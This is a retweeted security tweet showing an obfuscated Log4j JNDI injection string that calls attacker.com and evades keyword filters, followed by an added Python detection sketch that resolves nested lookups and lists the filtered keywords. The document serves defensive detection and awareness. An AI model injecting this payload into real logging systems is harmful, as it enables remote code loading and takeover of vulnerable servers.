@volkadav ("Mike Jackson") retweeted:
@Rezn0k ("Brandon Forbes") wrote:
If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you:
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
This gets past every filter I've found so far. There's no shortage of these bypasses.
#log4j
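
Added example, not part of the tweet: a detection-side sketch in Python showing why literal substring filters miss the string above and how resolving nested lookups from the inside out before matching exposes it. The function names (`resolve`, `find_jndi`, `naive_filter`) are hypothetical, the substitution rules only approximate Log4j's, and the code assumes any named variable is unset so the default after `:-` is used.

```python
import re

# An innermost lookup: "${", then text with no nested "${" and no "}", then "}".
INNERMOST = re.compile(r"\$\{((?:(?!\$\{)[^}])*)\}")

def resolve(body):
    """Approximate what Log4j would substitute for one innermost lookup body."""
    prefix = body.split(":", 1)[0].lower()
    if prefix in ("lower", "upper") and ":" in body:
        value = body.split(":", 1)[1]
        return value.lower() if prefix == "lower" else value.upper()
    if ":-" in body:
        # Assumption: the named variable is unset, so the default after ":-" is used.
        return body.split(":-", 1)[1]
    return ""  # unknown lookup with no default: assume it expands to nothing

def find_jndi(text, max_rounds=20):
    """Return the resolved ${jndi:...} expression hidden in text, or None."""
    for _ in range(max_rounds):
        matches = list(INNERMOST.finditer(text))
        if not matches:
            return None
        for m in matches:
            if m.group(1).lower().startswith("jndi:"):
                return m.group(0)
        # Nothing resolved to jndi yet: expand this layer and look again.
        text = INNERMOST.sub(lambda m: resolve(m.group(1)), text)
    return None

def naive_filter(text):
    """The literal-substring check the tweet says is bypassed."""
    low = text.lower()
    return any(s in low for s in ("ldap", "jndi", "${lower:"))

# Constructed sample log lines; the second embeds the string quoted in the tweet.
SAMPLES = [
    "GET /index.html 200 ua=Mozilla/5.0",
    "ua=${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}",
    "ua=${${lower:J}ndi:${lower:L}dap://example.invalid/a}",
    "user=${env:USER:-nobody} logged in",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(naive_filter(line), find_jndi(line), sep="\t")
```

A lookup whose real value cannot be known from the log line alone (for example an environment variable that is actually set on the target) may resolve differently than this sketch assumes, so treat a hit as a lead for triage rather than proof of what the logger evaluated.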